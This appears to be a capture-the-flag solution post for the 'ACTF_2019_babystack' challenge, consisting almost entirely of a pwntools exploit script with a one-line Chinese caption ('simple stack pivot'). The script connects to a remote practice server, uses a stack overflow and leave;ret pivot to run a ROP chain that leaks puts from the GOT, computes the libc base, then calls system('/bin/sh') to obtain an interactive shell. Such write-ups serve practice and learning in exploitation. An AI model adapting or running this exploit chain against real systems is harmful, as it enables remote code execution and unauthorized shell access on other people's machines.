actf_2019_babystack

exp

简单栈迁移

from pwn import *

#context.log_level = 'debug'

io = remote('node3.buuoj.cn',27019)
#io = process('./ACTF_2019_babystack')
#io = process('./idaidg/linux_server64')
elf = ELF('./ACTF_2019_babystack')

libc = ELF('./libc/libc-2.27.so')

pop_rdi = 0x400ad3
puts_plt = elf.plt['puts'] 
puts_got = elf.got['puts']
start = 0x4008f6
leave = 0x400a18
ret = 0x400a4f

io.recvuntil("How many bytes of your message?")
io.sendline('224')

io.recvuntil("Your message will be saved at ")
addr = io.recv()[:14]
addr = int(addr,16)
print hex(addr)

payload = 'a'* 8
payload += p64(pop_rdi)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(start)
payload = payload.ljust(0xd0,'a')
payload += p64(addr)
payload += p64(leave)

io.send(payload)
puts_addr = io.recvuntil('\x7f')[-6:]
puts_addr = puts_addr.ljust(8,'\x00')
print hex(u64(puts_addr))
libcbase = u64(puts_addr) - libc.symbols['puts']
system = libcbase + libc.symbols['system']
binsh = libcbase + libc.search('/bin/sh').next()

io.recvuntil("How many bytes of your message?")
io.sendline('224')
io.recvuntil("Your message will be saved at ")
addr = io.recv()[:14]
addr = int(addr,16)
print hex(addr)

payload = 'a'* 8
payload += p64(ret)
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(system)
payload = payload.ljust(0xd0,'a')
payload += p64(addr)
payload += p64(leave)

io.sendline(payload)

io.interactive()